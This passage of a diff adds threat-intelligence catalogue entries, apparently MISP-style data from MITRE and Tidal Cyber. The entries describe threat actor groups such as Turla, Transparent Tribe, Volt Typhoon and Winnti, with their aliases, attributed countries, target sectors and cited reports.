{ + "country": "CN", + "group_attack_id": "G0131", + "observed_countries": [ + "IN", + "JP", + "KR", + "MN", + "RU", + "TW", + "US" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Energy", + "Financial Services", + "Government", + "Manufacturing", + "Mining", + "Technology", + "Telecommunications" + ] + }, + "related": [ + { + "dest-uuid": "0ab7c8de-fc23-4793-99aa-7ee336199e26", + "type": "similar" + }, + { + "dest-uuid": "aee5a88d-6695-4221-a4fb-1f7aa1bfdcd4", + "type": "similar" + }, + { + "dest-uuid": "7e6588d8-8d1e-4ed0-a233-38f3b37c2aad", + "type": "similar" + }, + { + "dest-uuid": "9f9382c1-edc9-434c-945a-71bfdf28ca6f", + "type": "similar" + }, + { + "dest-uuid": "70c9c7d6-d51a-4c73-823f-fffd0d75f63e", + "type": "similar" + } + ], + "uuid": "9f5c5672-5e7e-4440-afc8-3fdf46a1bb6c", + "value": "Tonto Team" + }, + { + "description": "[[Crowdstrike Mythic Leopard Profile](https://app.tidalcyber.com/references/efa5dc67-3364-4049-bb13-8b9e1b55f172)][[Kaspersky Transparent Tribe August 2020](https://app.tidalcyber.com/references/42c7faa2-f664-4e4a-9d23-93c88a09da5b)][[Talos Transparent Tribe May 2021](https://app.tidalcyber.com/references/5d58c285-bc7d-4a8a-a96a-ac7118c1089d)]", + "meta": { + "id": "e41ed1f8-7e23-46d3-ae3b-aed9d2caffda" + }, + "related": [ + { + "dest-uuid": "441b91d1-256a-4763-bac6-8f1c76764a25", + "type": "similar" + } + ], + "uuid": "150aeea7-b49e-49cf-a884-f9e0f69a6742", + "value": "Mythic Leopard" + }, + { + "description": "[[Secureworks COPPER FIELDSTONE Profile](https://app.tidalcyber.com/references/d7f5f154-3638-47c1-8e1e-a30a6504a735)]", + "meta": { + "id": "7411aa5c-b1f3-413c-82bf-c397996b6106" + }, + "related": [ + { + "dest-uuid": "441b91d1-256a-4763-bac6-8f1c76764a25", + "type": "similar" + } + ], + "uuid": "4db20d24-3005-4fbb-af6e-94bb3841c25b", + "value": "COPPER FIELDSTONE" + }, + { + "description": "[[Talos Transparent Tribe May 2021](https://app.tidalcyber.com/references/5d58c285-bc7d-4a8a-a96a-ac7118c1089d)]", + "meta": { + "id": "5cfb7f3b-93bf-4430-938b-1d0b5efb721b" + }, + "related": [ + { + "dest-uuid": "441b91d1-256a-4763-bac6-8f1c76764a25", + "type": "similar" + } + ], + "uuid": "da9e7789-2d64-4684-87b9-8185f11b7410", + "value": "APT36" + }, + { + "description": "[[Unit 42 ProjectM March 2016](https://app.tidalcyber.com/references/adee82e6-a74a-4a91-ab5a-97847b135ca3)][[Kaspersky Transparent Tribe August 2020](https://app.tidalcyber.com/references/42c7faa2-f664-4e4a-9d23-93c88a09da5b)]", + "meta": { + "id": "eec8f5d0-a7df-4ace-b82b-1108d5f09fd5" + }, + "related": [ + { + "dest-uuid": "441b91d1-256a-4763-bac6-8f1c76764a25", + "type": "similar" + } + ], + "uuid": "6d979811-8a41-4407-be4b-b657a3bd3d20", + "value": "ProjectM" + }, + { + "description": "[Transparent Tribe](https://app.tidalcyber.com/groups/441b91d1-256a-4763-bac6-8f1c76764a25) is a suspected Pakistan-based threat group that has been active since at least 2013, primarily targeting diplomatic, defense, and research organizations in India and Afghanistan.[[Proofpoint Operation Transparent Tribe March 2016](https://app.tidalcyber.com/references/8e39d0da-114f-4ae6-8130-ca1380077d6a)][[Kaspersky Transparent Tribe August 2020](https://app.tidalcyber.com/references/42c7faa2-f664-4e4a-9d23-93c88a09da5b)][[Talos Transparent Tribe May 2021](https://app.tidalcyber.com/references/5d58c285-bc7d-4a8a-a96a-ac7118c1089d)]", + "meta": { + "country": "PK", + "group_attack_id": "G0134", + "observed_countries": [ + "AF", + "AU", + "AT", + "BD", + "BE", + "BW", + "CA", + "CN", + "CZ", + "GE", + "DE", + "IN", + "IR", + "JP", + "KE", + "LI", + "MY", + "MN", + "NP", + "NL", + "OM", + "PK", + "SA", + "ES", + "SE", + "CH", + "TH", + "TR", + "AE", + "GB", + "US" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Government" + ] + }, + "related": [ + { + "dest-uuid": "150aeea7-b49e-49cf-a884-f9e0f69a6742", + "type": "similar" + }, + { + "dest-uuid": "4db20d24-3005-4fbb-af6e-94bb3841c25b", + "type": "similar" + }, + { + "dest-uuid": "da9e7789-2d64-4684-87b9-8185f11b7410", + "type": "similar" + }, + { + "dest-uuid": "6d979811-8a41-4407-be4b-b657a3bd3d20", + "type": "similar" + } + ], + "uuid": "441b91d1-256a-4763-bac6-8f1c76764a25", + "value": "Transparent Tribe" + }, + { + "description": "[[Unit 42 Tropic Trooper Nov 2016](https://app.tidalcyber.com/references/cad84e3d-9506-44f8-bdd9-d090e6ce9b06)][[TrendMicro Tropic Trooper Mar 2018](https://app.tidalcyber.com/references/5d69d122-13bc-45c4-95ab-68283a21b699)]", + "meta": { + "id": "afd6e8f7-62f4-46cd-a366-8bd35da48511" + }, + "related": [ + { + "dest-uuid": "0a245c5e-c1a8-480f-8655-bb2594e3266b", + "type": "similar" + } + ], + "uuid": "72ad17b4-d973-48c4-aae9-5a95aaf2ee88", + "value": "KeyBoy" + }, + { + "description": "[[Crowdstrike Pirate Panda April 2020](https://app.tidalcyber.com/references/f71410b4-5f79-439a-ae9e-8965f9bc577f)]", + "meta": { + "id": "1fae48a9-1f79-4895-8bcc-e1cdc2b986d4" + }, + "related": [ + { + "dest-uuid": "0a245c5e-c1a8-480f-8655-bb2594e3266b", + "type": "similar" + } + ], + "uuid": "7157a2fe-6e59-40ae-a7de-4961444f9c56", + "value": "Pirate Panda" + }, + { + "description": "[Tropic Trooper](https://app.tidalcyber.com/groups/0a245c5e-c1a8-480f-8655-bb2594e3266b) is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. [Tropic Trooper](https://app.tidalcyber.com/groups/0a245c5e-c1a8-480f-8655-bb2594e3266b) focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011.[[TrendMicro Tropic Trooper Mar 2018](https://app.tidalcyber.com/references/5d69d122-13bc-45c4-95ab-68283a21b699)][[Unit 42 Tropic Trooper Nov 2016](https://app.tidalcyber.com/references/cad84e3d-9506-44f8-bdd9-d090e6ce9b06)][[TrendMicro Tropic Trooper May 2020](https://app.tidalcyber.com/references/4fbc1df0-f174-4461-817d-0baf6e947ba1)]", + "meta": { + "group_attack_id": "G0081", + "observed_countries": [ + "HK", + "PH", + "TW" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Government", + "Healthcare", + "High Tech", + "Transportation" + ] + }, + "related": [ + { + "dest-uuid": "7f16d1f5-04ee-4d99-abf0-87e1f23f9fee", + "type": "similar" + }, + { + "dest-uuid": "72ad17b4-d973-48c4-aae9-5a95aaf2ee88", + "type": "similar" + }, + { + "dest-uuid": "7157a2fe-6e59-40ae-a7de-4961444f9c56", + "type": "similar" + } + ], + "uuid": "0a245c5e-c1a8-480f-8655-bb2594e3266b", + "value": "Tropic Trooper" + }, + { + "description": "Based similarity in TTPs and malware used, Turla and Waterbug appear to be the same group.[[Symantec Waterbug](https://app.tidalcyber.com/references/ec02f951-17b8-44cb-945a-e5c313555124)]", + "meta": { + "id": "fc87b05b-4404-410c-b27d-7d9b077245f1" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "similar" + } + ], + "uuid": "58827a83-6a90-4cee-8b9a-7c033bf90dee", + "value": "Waterbug" + }, + { + "description": "WhiteBear is a designation used by Securelist to describe a cluster of activity that has overlaps with activity described by others as Turla, but appears to have a separate focus.[[Securelist WhiteBear Aug 2017](https://app.tidalcyber.com/references/44626060-3d9b-480e-b4ea-7dac27878e5e)][[Talos TinyTurla September 2021](https://app.tidalcyber.com/references/94cdbd73-a31a-4ec3-aa36-de3ea077c1c7)]", + "meta": { + "id": "201c6a8b-499b-4dc7-a4c4-c23a7355d502" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "similar" + } + ], + "uuid": "9cea8cef-dd46-4997-baba-d2dea899e193", + "value": "WhiteBear" + }, + { + "description": "[[Secureworks IRON HUNTER Profile](https://app.tidalcyber.com/references/af5cb7da-61e0-49dc-8132-c019ce5ea6d3)]", + "meta": { + "id": "462301bf-d936-436a-95f8-4b7c7b972428" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "similar" + } + ], + "uuid": "1bf28831-a2fd-4dc5-885c-9cdf84d43535", + "value": "IRON HUNTER" + }, + { + "description": "[[Leonardo Turla Penquin May 2020](https://app.tidalcyber.com/references/09d8bb54-6fa5-4842-98aa-6e9656a19092)]", + "meta": { + "id": "3633bd53-4478-48b2-aadf-5b959bdd8de0" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "similar" + } + ], + "uuid": "3cf95a2f-a7b8-4061-b477-16729657f8f3", + "value": "Group 88" + }, + { + "description": "[[Accenture HyperStack October 2020](https://app.tidalcyber.com/references/680f2a0b-f69d-48bd-93ed-20ee2f79e3f7)]", + "meta": { + "id": "baac52c8-bc05-4e9d-9d5a-2d2f448be346" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "similar" + } + ], + "uuid": "4087cefb-c0d4-401b-aa6c-dca93aed1c3c", + "value": "Belugasturgeon" + }, + { + "description": "[[CrowdStrike VENOMOUS BEAR](https://app.tidalcyber.com/references/ee400057-2b26-4464-96b4-484c9eb9d5c2)][[ESET Turla PowerShell May 2019](https://app.tidalcyber.com/references/68c0f34b-691a-4847-8d49-f18b7f4e5188)][[Talos TinyTurla September 2021](https://app.tidalcyber.com/references/94cdbd73-a31a-4ec3-aa36-de3ea077c1c7)]", + "meta": { + "id": "f6a74f26-fcd8-4128-9b76-6fbda75ff6a9" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "similar" + } + ], + "uuid": "e934559a-b3c1-4e72-a5c9-e1abd7b2ae78", + "value": "Snake" + }, + { + "description": "[[CrowdStrike VENOMOUS BEAR](https://app.tidalcyber.com/references/ee400057-2b26-4464-96b4-484c9eb9d5c2)]", + "meta": { + "id": "72100212-b904-45e8-932e-3fc5ab1040df" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "similar" + } + ], + "uuid": "7a2f17eb-6674-461d-89c4-6f40e1b6cdf5", + "value": "Krypton" + }, + { + "description": "[[CrowdStrike VENOMOUS BEAR](https://app.tidalcyber.com/references/ee400057-2b26-4464-96b4-484c9eb9d5c2)][[Talos TinyTurla September 2021](https://app.tidalcyber.com/references/94cdbd73-a31a-4ec3-aa36-de3ea077c1c7)]", + "meta": { + "id": "42650149-9fc9-40ab-9780-792825fd8b99" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "similar" + } + ], + "uuid": "3637113f-d45f-4c97-aec0-16eaa7e3fc62", + "value": "Venomous Bear" + }, + { + "description": "[Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) is a cyber espionage threat group that has been attributed to Russia's Federal Security Service (FSB). They have compromised victims in over 50 countries since at least 2004, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies. [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) is known for conducting watering hole and spearphishing campaigns, and leveraging in-house tools and malware, such as [Uroburos](https://app.tidalcyber.com/software/89ffc27c-b81f-473a-87d6-907cacdce61c).[[Kaspersky Turla](https://app.tidalcyber.com/references/535e9f1a-f89e-4766-a290-c5b8100968f8)][[ESET Gazer Aug 2017](https://app.tidalcyber.com/references/9d1c40af-d4bc-4d4a-b667-a17378942685)][[CrowdStrike VENOMOUS BEAR](https://app.tidalcyber.com/references/ee400057-2b26-4464-96b4-484c9eb9d5c2)][[ESET Turla Mosquito Jan 2018](https://app.tidalcyber.com/references/cd177c2e-ef22-47be-9926-61e25fd5f33b)][[Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023](https://app.tidalcyber.com/references/1931b80a-effb-59ec-acae-c0f17efb8cad)]", + "meta": { + "country": "RU", + "group_attack_id": "G0010", + "observed_countries": [ + "AF", + "DZ", + "AR", + "AM", + "AU", + "AT", + "AZ", + "BY", + "BE", + "BO", + "BW", + "BR", + "BG", + "CL", + "CN", + "CY", + "CZ", + "DK", + "EC", + "EE", + "FI", + "FR", + "GE", + "DE", + "HK", + "HU", + "IN", + "ID", + "IR", + "IQ", + "IT", + "JM", + "JO", + "KZ", + "KR", + "KW", + "KG", + "LV", + "LT", + "MX", + "MD", + "ME", + "NL", + "PK", + "PY", + "PL", + "QA", + "RO", + "RU", + "SA", + "RS", + "SG", + "ZA", + "ES", + "SE", + "CH", + "SY", + "TJ", + "TH", + "TN", + "TR", + "TM", + "UA", + "GB", + "US", + "UY", + "UZ", + "VE", + "VN", + "YE" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [ + "a2e000da-8181-4327-bacd-32013dbd3654" + ], + "target_categories": [ + "Aerospace", + "Defense", + "Education", + "Government", + "Non Profit", + "Pharmaceuticals", + "Telecommunications" + ] + }, + "related": [ + { + "dest-uuid": "fa80877c-f509-4daf-8b62-20aba1635f68", + "type": "similar" + }, + { + "dest-uuid": "58827a83-6a90-4cee-8b9a-7c033bf90dee", + "type": "similar" + }, + { + "dest-uuid": "9cea8cef-dd46-4997-baba-d2dea899e193", + "type": "similar" + }, + { + "dest-uuid": "1bf28831-a2fd-4dc5-885c-9cdf84d43535", + "type": "similar" + }, + { + "dest-uuid": "3cf95a2f-a7b8-4061-b477-16729657f8f3", + "type": "similar" + }, + { + "dest-uuid": "4087cefb-c0d4-401b-aa6c-dca93aed1c3c", + "type": "similar" + }, + { + "dest-uuid": "e934559a-b3c1-4e72-a5c9-e1abd7b2ae78", + "type": "similar" + }, + { + "dest-uuid": "7a2f17eb-6674-461d-89c4-6f40e1b6cdf5", + "type": "similar" + }, + { + "dest-uuid": "3637113f-d45f-4c97-aec0-16eaa7e3fc62", + "type": "similar" + } + ], + "uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "value": "Turla" + }, + { + "description": "Vice Society is an extortion-focused threat actor group first observed in mid-2021. The group gained notoriety after targeting a considerable number of educational institutions, especially lower education institutions. Although the education sector accounts for a disproportionate amount of the group’s victims, Vice Society has claimed victims in multiple other industries too, including the healthcare, retail, financial, insurance, and public services sectors. The group regularly pressures victims into paying a ransom by threatening to leak data exfiltrated during its intrusions. Vice Society is not known to have developed its own ransomware, instead deploying other existing families, including HELLOKITTY/FIVEHANDS and Zeppelin.[[U.S. CISA Vice Society September 2022](/references/0a754513-5f20-44a0-8cea-c5d9519106c8)]\n\n**Related Vulnerabilities**: CVE-2021-1675[[Unit 42 Vice Society December 6 2022](/references/6abf7387-0857-4938-b36e-1374a66d4ed8)], CVE-2021-34527[[Unit 42 Vice Society December 6 2022](/references/6abf7387-0857-4938-b36e-1374a66d4ed8)]", + "meta": { + "group_attack_id": "G5012", + "observed_countries": [ + "AR", + "AU", + "AT", + "BR", + "CA", + "CO", + "FR", + "GF", + "DE", + "GR", + "GL", + "IN", + "ID", + "IT", + "KW", + "LB", + "MY", + "NZ", + "PL", + "PT", + "SA", + "SG", + "ES", + "SE", + "CH", + "TH", + "UA", + "GB", + "US" + ], + "observed_motivations": [ + "Financial Gain" + ], + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "4bc9ab8f-7f57-4b1a-8857-ffaa7e5cc930", + "15787198-6c8b-4f79-bf50-258d55072fee", + "a6ba64e1-4b4a-4bbd-a26d-ce35c22b2530", + "adf0c8d2-f06f-49a5-a3f4-e6cf5f502b1c", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "target_categories": [ + "Construction", + "Energy", + "Financial Services", + "Government", + "Healthcare", + "High Tech", + "Hospitality Leisure", + "Insurance", + "Legal", + "Manufacturing", + "Media", + "Non Profit", + "Retail", + "Telecommunications", + "Transportation", + "Utilities" + ] + }, + "related": [], + "uuid": "2e2d3e75-1160-4ba5-80cc-8e7685fcfc44", + "value": "Vice Society" + }, + { + "description": "[[ClearSky Lebanese Cedar Jan 2021](https://app.tidalcyber.com/references/53944d48-caa9-4912-b42d-94a3789ed15b)]", + "meta": { + "id": "11222cec-4905-40d8-a9ec-100735108365" + }, + "related": [ + { + "dest-uuid": "7c3ef21c-0e1c-43d5-afb0-3a07c5a66937", + "type": "similar" + } + ], + "uuid": "3dc34f21-1b3f-4952-97e9-c9df61379962", + "value": "Lebanese Cedar" + }, + { + "description": "[Volatile Cedar](https://app.tidalcyber.com/groups/7c3ef21c-0e1c-43d5-afb0-3a07c5a66937) is a Lebanese threat group that has targeted individuals, companies, and institutions worldwide. [Volatile Cedar](https://app.tidalcyber.com/groups/7c3ef21c-0e1c-43d5-afb0-3a07c5a66937) has been operating since 2012 and is motivated by political and ideological interests.[[CheckPoint Volatile Cedar March 2015](https://app.tidalcyber.com/references/a26344a2-63ca-422e-8cf9-0cf22a5bee72)][[ClearSky Lebanese Cedar Jan 2021](https://app.tidalcyber.com/references/53944d48-caa9-4912-b42d-94a3789ed15b)]", + "meta": { + "country": "LB", + "group_attack_id": "G0123", + "observed_countries": [ + "EG", + "JO", + "KW", + "LB", + "SA", + "TR", + "AE" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Education", + "Government", + "Media", + "Telecommunications" + ] + }, + "related": [ + { + "dest-uuid": "3dc34f21-1b3f-4952-97e9-c9df61379962", + "type": "similar" + } + ], + "uuid": "7c3ef21c-0e1c-43d5-afb0-3a07c5a66937", + "value": "Volatile Cedar" + }, + { + "description": "Volt Typhoon is a China state-backed threat actor that has targeted critical infrastructure organizations in a range of specific sectors in Guam and elsewhere in the United States since mid-2021. Its activities primarily focus on espionage and information gathering. Researchers indicate the group is focused on maintaining stealth and persistence in victim networks for as long as possible, leveraging a large number of living-off-the-land techniques to accomplish these goals. Researchers assessed with moderate confidence that Volt Typhoon's activities are focused on developing capabilities that could disrupt communications infrastructure between the United States and entities in Asia in the event of a potential geopolitical crisis.[[U.S. CISA Volt Typhoon May 24 2023](/references/12320f38-ebbf-486a-a450-8a548c3722d6)]\n\n**Related Vulnerabilities**: CVE-2021-40539, CVE-2021-27860[[U.S. CISA Volt Typhoon May 24 2023](/references/12320f38-ebbf-486a-a450-8a548c3722d6)]", + "meta": { + "country": "CN", + "group_attack_id": "G5001", + "observed_countries": [ + "GU", + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "758c3085-2f79-40a8-ab95-f8a684737927", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "97cc0c9b-3625-42c3-824a-646a91702977", + "53331b05-782f-45fc-b925-27c9598dde80" + ], + "target_categories": [ + "Construction", + "Education", + "Government", + "Manufacturing", + "Maritime", + "Technology", + "Telecommunications", + "Transportation", + "Utilities" + ] + }, + "related": [], + "uuid": "3290dcb9-5781-4b87-8fa0-6ae820e152cd", + "value": "Volt Typhoon" + }, + { + "description": "[[Secureworks BRONZE SILHOUETTE May 2023](https://app.tidalcyber.com/references/77624549-e170-5894-9219-a15b4aa31726)]", + "meta": { + "id": "3845a076-bf99-5224-bbe1-7e9e5393a25f" + }, + "related": [ + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "similar" + } + ], + "uuid": "a7d8b128-d997-5d59-9aa2-9db35ff658c7", + "value": "BRONZE SILHOUETTE" + }, + { + "description": "[[U.S. CISA Volt Typhoon February 7 2024](/references/c74f5ecf-8810-4670-b778-24171c078724)]", + "meta": { + "id": "55384b19-c2c3-4527-b759-d23d61d8014a", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "similar" + } + ], + "uuid": "33ec6e60-3e48-4ad8-9960-d59af6260c52", + "value": "Vanguard Panda" + }, + { + "description": "[[U.S. CISA Volt Typhoon February 7 2024](/references/c74f5ecf-8810-4670-b778-24171c078724)]", + "meta": { + "id": "c12f51e2-30ea-4cdd-a2df-abc7d17e961a", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "similar" + } + ], + "uuid": "dba5e3cd-8c54-4129-a4f3-adcb1ded182a", + "value": "Dev-0391" + }, + { + "description": "[[U.S. CISA Volt Typhoon February 7 2024](/references/c74f5ecf-8810-4670-b778-24171c078724)]", + "meta": { + "id": "89106490-5646-4fa6-9bae-c83098e41874", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "similar" + } + ], + "uuid": "b38b4cff-e574-4d39-b2c5-365bcb14b7b6", + "value": "UNC3236" + }, + { + "description": "[[U.S. CISA Volt Typhoon February 7 2024](/references/c74f5ecf-8810-4670-b778-24171c078724)]", + "meta": { + "id": "757b8c7c-9c62-405b-ae3c-37ef25f45144", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "similar" + } + ], + "uuid": "950dd0a9-0045-4956-bf7b-3b3be491b086", + "value": "Voltzite" + }, + { + "description": "[[U.S. CISA Volt Typhoon February 7 2024](/references/c74f5ecf-8810-4670-b778-24171c078724)]", + "meta": { + "id": "e8ad4226-71c7-4f9c-a1f7-4fc3e339d2fb", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "similar" + } + ], + "uuid": "c93b36a8-c2b7-4f54-830e-86040830a9f5", + "value": "Insidious Taurus" + }, + { + "description": "[Volt Typhoon](https://app.tidalcyber.com/groups/4ea1245f-3f35-5168-bd10-1fc49142fd4e) is a People's Republic of China (PRC) state-sponsored actor that has been active since at least 2021. [Volt Typhoon](https://app.tidalcyber.com/groups/4ea1245f-3f35-5168-bd10-1fc49142fd4e) typically focuses on espionage and information gathering and has targeted critical infrastructure organizations in the US including Guam. [Volt Typhoon](https://app.tidalcyber.com/groups/4ea1245f-3f35-5168-bd10-1fc49142fd4e) has emphasized stealth in operations using web shells, living-off-the-land (LOTL) binaries, hands on keyboard activities, and stolen credentials.[[Microsoft Volt Typhoon May 2023](https://app.tidalcyber.com/references/8b74f0b7-9719-598c-b3ee-61d734393e6f)][[Joint Cybersecurity Advisory Volt Typhoon June 2023](https://app.tidalcyber.com/references/14872f08-e219-5c0d-a2d7-43a3ba348b4b)][[Secureworks BRONZE SILHOUETTE May 2023](https://app.tidalcyber.com/references/77624549-e170-5894-9219-a15b4aa31726)]", + "meta": { + "country": "CN", + "group_attack_id": "G1017", + "observed_countries": [ + "GU", + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [ + "758c3085-2f79-40a8-ab95-f8a684737927", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "97cc0c9b-3625-42c3-824a-646a91702977", + "53331b05-782f-45fc-b925-27c9598dde80" + ], + "target_categories": [ + "Construction", + "Education", + "Government", + "Manufacturing", + "Maritime", + "Technology", + "Telecommunications", + "Transportation", + "Utilities" + ] + }, + "related": [ + { + "dest-uuid": "a7d8b128-d997-5d59-9aa2-9db35ff658c7", + "type": "similar" + }, + { + "dest-uuid": "33ec6e60-3e48-4ad8-9960-d59af6260c52", + "type": "similar" + }, + { + "dest-uuid": "dba5e3cd-8c54-4129-a4f3-adcb1ded182a", + "type": "similar" + }, + { + "dest-uuid": "b38b4cff-e574-4d39-b2c5-365bcb14b7b6", + "type": "similar" + }, + { + "dest-uuid": "950dd0a9-0045-4956-bf7b-3b3be491b086", + "type": "similar" + }, + { + "dest-uuid": "c93b36a8-c2b7-4f54-830e-86040830a9f5", + "type": "similar" + } + ], + "uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "value": "Volt Typhoon" + }, + { + "description": "[Whitefly](https://app.tidalcyber.com/groups/f0943620-7bbb-4239-8ed3-c541c36baaa1) is a cyber espionage group that has been operating since at least 2017. The group has targeted organizations based mostly in Singapore across a wide variety of sectors, and is primarily interested in stealing large amounts of sensitive information. The group has been linked to an attack against Singapore’s largest public health organization, SingHealth.[[Symantec Whitefly March 2019](https://app.tidalcyber.com/references/d0e48356-36d9-4b4c-b621-e3c4404378d2)]", + "meta": { + "group_attack_id": "G0107", + "observed_countries": [ + "SG" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Healthcare", + "Media", + "Telecommunications" + ] + }, + "related": [], + "uuid": "f0943620-7bbb-4239-8ed3-c541c36baaa1", + "value": "Whitefly" + }, + { + "description": "The [Windigo](https://app.tidalcyber.com/groups/eeb69751-8c22-4a5f-8da2-239cc7d7746c) group has been operating since at least 2011, compromising thousands of Linux and Unix servers using the [Ebury](https://app.tidalcyber.com/software/2375465a-e6a9-40ab-b631-a5b04cf5c689) SSH backdoor to create a spam botnet. Despite law enforcement intervention against the creators, [Windigo](https://app.tidalcyber.com/groups/eeb69751-8c22-4a5f-8da2-239cc7d7746c) operators continued updating [Ebury](https://app.tidalcyber.com/software/2375465a-e6a9-40ab-b631-a5b04cf5c689) through 2019.[[ESET Windigo Mar 2014](https://app.tidalcyber.com/references/721cdb36-d3fc-4212-b324-6be2b5f9cb46)][[CERN Windigo June 2019](https://app.tidalcyber.com/references/e9f1289f-a32e-441c-8787-cb32a26216d1)]", + "meta": { + "group_attack_id": "G0124", + "observed_countries": [], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [], + "uuid": "eeb69751-8c22-4a5f-8da2-239cc7d7746c", + "value": "Windigo" + }, + { + "description": "[[SANS Windshift August 2018](https://app.tidalcyber.com/references/97eac0f2-d528-4f7c-8425-7531eae4fc39)]", + "meta": { + "id": "79b3abef-e42b-40c7-958d-cea379561a78" + }, + "related": [ + { + "dest-uuid": "4e880d01-313a-4926-8470-78c48824aa82", + "type": "similar" + } + ], + "uuid": "9e192d35-5371-4e21-bc63-62e10a8a5a44", + "value": "Bahamut" + }, + { + "description": "[Windshift](https://app.tidalcyber.com/groups/4e880d01-313a-4926-8470-78c48824aa82) is a threat group that has been active since at least 2017, targeting specific individuals for surveillance in government departments and critical infrastructure across the Middle East.[[SANS Windshift August 2018](https://app.tidalcyber.com/references/97eac0f2-d528-4f7c-8425-7531eae4fc39)][[objective-see windtail1 dec 2018](https://app.tidalcyber.com/references/7a32c962-8050-45de-8b90-8644be5109d9)][[objective-see windtail2 jan 2019](https://app.tidalcyber.com/references/e6bdc679-ee0c-4f34-b5bc-0d6a26485b36)]", + "meta": { + "group_attack_id": "G0112", + "observed_countries": [], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Government", + "Infrastructure" + ] + }, + "related": [ + { + "dest-uuid": "9e192d35-5371-4e21-bc63-62e10a8a5a44", + "type": "similar" + } + ], + "uuid": "4e880d01-313a-4926-8470-78c48824aa82", + "value": "Windshift" + }, + { + "description": "[[Symantec Suckfly March 2016](https://app.tidalcyber.com/references/8711c175-e405-4cb0-8c86-8aaa471e5573)]", + "meta": { + "id": "cd7e1e48-b13a-4124-ad7b-e3c82f563b4c" + }, + "related": [ + { + "dest-uuid": "6932662a-53a7-4e43-877f-6e940e2d744b", + "type": "similar" + } + ], + "uuid": "453f7dbf-bde7-4cf3-af5d-a6ac10335980", + "value": "Blackfly" + }, + { + "description": "[Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b) is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting.[[Kaspersky Winnti April 2013](https://app.tidalcyber.com/references/2d4834b9-61c4-478e-919a-317d97cd2c36)][[Kaspersky Winnti June 2015](https://app.tidalcyber.com/references/86504950-0f4f-42bc-b003-24f60ae97c99)][[Novetta Winnti April 2015](https://app.tidalcyber.com/references/cbe8373b-f14b-4890-99fd-35ffd7090dea)] Some reporting suggests a number of other groups, including [Axiom](https://app.tidalcyber.com/groups/90f4d3f9-3fe3-4a64-8dc1-172c6d037dca), [APT17](https://app.tidalcyber.com/groups/5f083251-f5dc-459a-abfc-47a1aa7f5094), and [Ke3chang](https://app.tidalcyber.com/groups/26c0925f-1a3c-4df6-b27a-62b9731299b8), are closely linked to [Winnti 